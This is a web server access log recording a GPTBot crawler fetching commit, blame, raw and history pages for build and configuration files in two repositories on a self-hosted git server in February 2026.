"/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11778] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" +[17/Feb/2026:16:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11285] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11284] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11283] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11284] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11281] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11283] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11286] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11285] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11284] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:16:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11774] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" +[17/Feb/2026:16:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11773] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" +[17/Feb/2026:16:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json?display=source" [Client 74.7.227.38] [Length 11784] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:16:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fxref-GoldMonitor.html" [Client 74.7.227.38] [Length 20982] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:16:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fxref-AssetPilot.html" [Client 74.7.227.38] [Length 20986] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:16:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11018] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" +[17/Feb/2026:16:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11017] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" +[17/Feb/2026:16:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore?display=source" [Client 74.7.227.38] [Length 12043] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" +[17/Feb/2026:16:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" +[17/Feb/2026:16:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:16:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore?display=source" [Client 74.7.227.38] [Length 11003] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" +[17/Feb/2026:16:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore?display=source" [Client 74.7.227.38] [Length 10967] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" +[17/Feb/2026:16:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" +[17/Feb/2026:16:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore?display=source" [Client 74.7.227.38] [Length 12045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" +[17/Feb/2026:16:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2frules.ninja" [Client 74.7.227.38] [Length 26965] [Gzip 5.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:16:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8499] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostissues&state=closed" +[17/Feb/2026:16:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11687] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:16:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 